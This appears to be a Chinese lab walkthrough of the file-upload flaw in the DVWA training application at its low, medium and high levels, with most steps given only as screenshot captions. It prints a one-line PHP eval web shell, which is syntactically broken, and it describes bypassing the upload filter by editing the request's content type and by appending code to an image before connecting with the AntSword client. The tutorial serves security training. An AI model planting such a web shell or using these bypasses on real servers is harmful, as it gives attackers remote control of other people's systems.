DVWA文件上传漏洞低级_中级_高级

php一句话脚本

<?php @eval($_REQUEST[777]?>

一. 文件上传初级

1 调整初级-file upload -上传文件 -查看代码未对文件php后缀进行过滤
<?php @eval($_REQUEST[777]?>

DVWA文件上传漏洞低级_中级_高级_第1张图片

2 点击upload上传文件

DVWA文件上传漏洞低级_中级_高级_第2张图片

上传成功

DVWA文件上传漏洞低级_中级_高级_第3张图片

打开蚁剑【antsword】

DVWA文件上传漏洞低级_中级_高级_第4张图片
DVWA文件上传漏洞低级_中级_高级_第5张图片
DVWA文件上传漏洞低级_中级_高级_第6张图片

二. 文件中级上传

1 调整中级-对源码进行分析

中级的只是对文件的类型进行过滤—没有对文件的后缀进行过滤
DVWA文件上传漏洞低级_中级_高级_第7张图片

2 使用抓包进行修改-修改文件类型

DVWA文件上传漏洞低级_中级_高级_第8张图片

3 修改好后进行放包

DVWA文件上传漏洞低级_中级_高级_第9张图片

4 php一句话的已成功上传

DVWA文件上传漏洞低级_中级_高级_第10张图片

5 使用蚁剑连接-成功(省略)

三. 高级级别-文件上传

1 高级级别代码分析

DVWA文件上传漏洞低级_中级_高级_第11张图片

2 上传文件

DVWA文件上传漏洞低级_中级_高级_第12张图片

3 抓到的源数据包

DVWA文件上传漏洞低级_中级_高级_第13张图片

4 修改后的数据包

DVWA文件上传漏洞低级_中级_高级_第14张图片

5 已成功上传

DVWA文件上传漏洞低级_中级_高级_第15张图片

发现是图片,不能执行php一句话,追加代码已上传

DVWA文件上传漏洞低级_中级_高级_第16张图片

你可能感兴趣的:(文件上传漏洞,安全,网络安全)